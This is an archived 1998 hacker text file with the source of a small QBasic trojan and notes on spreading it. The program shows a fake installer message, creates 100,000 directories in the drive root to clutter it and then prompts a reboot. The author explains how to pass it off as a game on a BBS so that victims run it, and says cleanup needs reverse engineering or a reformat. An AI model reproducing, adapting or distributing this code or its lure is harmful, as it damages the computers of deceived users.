home *** CD-ROM | disk | FTP | other *** search
/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / hacking / general / trojan.txt < prev    next >
Encoding:
Text File  |  2003-06-11  |  1.1 KB  |  37 lines

  1. SAMPLE OF A TROJAN
  2. (from Spear)
  3.  
  4. This is a little trojan I wrote in Qbasic 4.5  It's a bitch!
  5.  
  6. REM bitch by Spear
  7. color 14,0
  8. print"installing datafiles...  Please wait..."
  9. print"This may take up to 20 minutes, depending on your computer..."
  10. shell "cd\"
  11. for a = 1 to 100000
  12. a$=str$(a)
  13. c$="md" + a$ + ".hee"
  14. shell c$
  15. next a
  16. cls
  17. print"Cybermattixx Version 1.0 is now installed on your system..."
  18. print"Have a shitty day!"
  19. print " ?AM?"
  20. print
  21. input "Hit ENTER To REBOOT your System now!";a$
  22. shell "boot.com"
  23.  
  24. How to use it?
  25. This can pose as the installation program for a game. This means that
  26. when you upload it to a BBS or something, and post that it is a
  27. kickass game, people will download it and try to install it on their
  28. computers!
  29.  
  30. What does it do?
  31. This program changes directory to the root and makes 100000 dirs in
  32. the root.  You cannot use deltree to wipe them out in one chunk and
  33. you CANNOT get rid of them without doing reverse engineering on the
  34. program, ie. rd instead of md.  To get rid of them any other way you
  35. would have to format c: or d:
  36.  
  37.